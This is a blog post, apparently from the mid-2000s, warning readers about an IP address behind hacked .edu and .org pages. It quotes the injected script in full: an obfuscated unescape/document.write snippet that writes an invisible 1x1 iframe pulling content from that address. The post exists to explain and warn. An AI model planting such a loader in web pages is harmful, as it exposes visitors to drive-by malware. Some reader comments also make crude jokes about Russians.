Navigate/Search

A malicious IP address to watch for: [81.95.146.98]

If you get an alert that your browser is trying to download something (anything!) from [81.95.146.98], don’t do it. Why, you ask?

Because it’s probably a Trojan Horse, that’s why!

Here’s the deal – y’all probably know that I help run The Mystery of the Haunted Vampire, right? Well, some of the latest comment spam that we’ve been getting has followed a very particular pattern: .edu and .org sites (legitimate sites) with link spam goodness in support directories, like “files” or “data” or “html” or “images” – whatever. That isn’t too important. The kicker is that these f*ckers are also downloading the main index page and modifying it. Badly set site permissions then allow these spambags to post the modified main page (that looks exactly like the original back) to the main site.

The problem is that this new page is itself a Trojan Horse – it now contains a JavaScript that loads content from another site. Buried within the HTML of the hacked page is something that looks like this:

<script language="javascript"gt; document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E
%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20
%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67
%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </script>

That blah%blah%blah represents URL encoding – “unescape” tells the JavaScript to turn that gobbledy-gook back into readable characters, which in turn translates to http://81.95.146.98/index.html. This IP address is owned by a Russian ISP incorporated in Panama.

A Russian-owned ISP incorporated in Panama. Repeat that a couple of times, m’kay?

No, that doesn’t sound suspicious at all, does it?

They’ve changed their tactics a little over the past couple of days. When I first saw this script, they were trying to write borderless, scrolless 1 x 1 frames (ie, invisible) from the site – now, they’re masquerading as various proprietary (but safe-sounding) file formats. Whatever happens, don’t click OK!

How did I find this out? Well, yesterday after going through my standard anti-spam paces of notifying one of the victims that they’d been hacked, I notified the Russian/Panamanian ISP that they had a rogue customer since this was the 3rd or 4th time I’d seen that same IP address embedded in the JavaScript. This evening, I was browsing a random site while looking for possible vacation rentals and got the “Do you want to download this file” message – from the same IP address!

D’oh! It isn’t the IP address that’s rogue – it might be the whole bloody company!

So there you have it, kids. Don’t download anything from Russians working in Panama (God, that sounds like a Warren Zevon song, doesn’t it? Or something out of Gibson. Or Burgess, even). And if anyone from the network in question (rbnnetwork.com) tries to sell you their services, ask ’em about the spammers that they harbor, ‘kay?

And lastly, if you did click “OK” recently? I hope you’ve a.) got good anti-virus software and b.) got a backup of your critical files. You’re probably going to need both…

[Updated to add: Oh yeah – if you’re using Internet Explorer, you’re *so* going to need anti-virus software. These f*ckers have been around for a while. Note to self: Russian ISPs in Panama are not to be notified that they have rogue customers – they are the rogue customers.]

4 Responses to “A malicious IP address to watch for: [81.95.146.98]”

  1. Carnacki Says:

    This is enough to make me despise Panamanian Russians.

    I bet they’re former KGB too.

  2. protected static Says:

    There’s a line in William S Burroughs that keeps coming to mind – “like you find in a Chinese restaurant in Panama…”

    It has that same level of… unexpectedness to it.

  3. Carnacki Says:

    This is enough to make me despise Panamanian Russians.

    I bet they're former KGB too.

  4. protected static Says:

    There's a line in William S Burroughs that keeps coming to mind – "like you find in a Chinese restaurant in Panama…"

    It has that same level of… unexpectedness to it.

Leave a Reply